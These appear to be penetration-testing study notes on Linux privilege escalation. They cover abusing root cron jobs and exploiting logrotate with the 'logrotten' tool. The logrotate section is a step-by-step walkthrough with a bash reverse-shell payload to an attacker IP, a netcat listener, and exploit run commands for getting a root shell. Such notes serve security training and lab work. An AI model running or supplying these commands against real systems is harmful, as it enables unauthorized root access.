Programs, Jobs and Services

CronJob Abuse

Scheduled jobs, typically used for administrative tasks, creating backups, cleaning directories etc

The crontab command can create a cron file, which will be run by the cron daemon on the schedule specified

When created, the cron file will be created in /var/spool/cron for the specific user that creates it

Each entry in the crontab file requires six items in the following order: minutes, hours, days, months, weeks, commands.

Exploiting Cronjobs:

  • By using pspy we can view running processes and commands run by others users without the need for root privileges

  • CronJobs can be abused by analyzing their behaviour and the files they interact with

  • Suppose a cronjob runs a backup script as root periodically.

  • If we can interact with any resources handled by the script (or the script itself) we may be able to edit the logic of such script in order to get a reverse shell as the user running such cronjob (root)

Logrotate Abuse

logrotate is a tool (typically ran as a cronjob) used to manage all logs in /var/logs

Its global settings configuration file is located at /etc/logrotate.conf, the /etc/logrotate.d/ instead contains the configuration files for all forced rotations (after the first one)

Exploiting logrotate with LogRotten:

  • Prerequisites: logrotate must run as root and we need write permissions on the logrotate log files

  • Vulnerable versions: 3.8.6 3.11.0 3.15.0 3.18.0

  • Exploitation steps:

    1. Use pspy to verify that a cronjob running logrotate as root is ran periodically

    2. Identify the logfile being rotated periodically: such files typically have a filename format like filename.log.1 for the first rotation, then filename.log.2 and so on

    3. git clone

    4. gcc logrotten.c -o logrotten

    5. echo 'bash -i >& /dev/tcp/your-ip/nc-port 0>&1' > payload

    6. Start the netcat listener on the attacker machine: nc -lvnp 9001

    7. Determine the option used by logrotate (create or compress): grep "create\|compress" /etc/logrotate.conf | grep -v "#"

    8. Adapt the payload based on the option specified in the logrotate.conf file:

      • Create: ./logrotten -p ./payload /tmp/log/pwnme.log

      • Compress: ./logrotten -p ./payload -c -s 4 /tmp/log/pwnme.log

    9. Wait for the rotation and get the reverse shell as root

    10. Disclaimer: sometimes you might need to edit the logfile (add a blank space) in order to trigger the rotation

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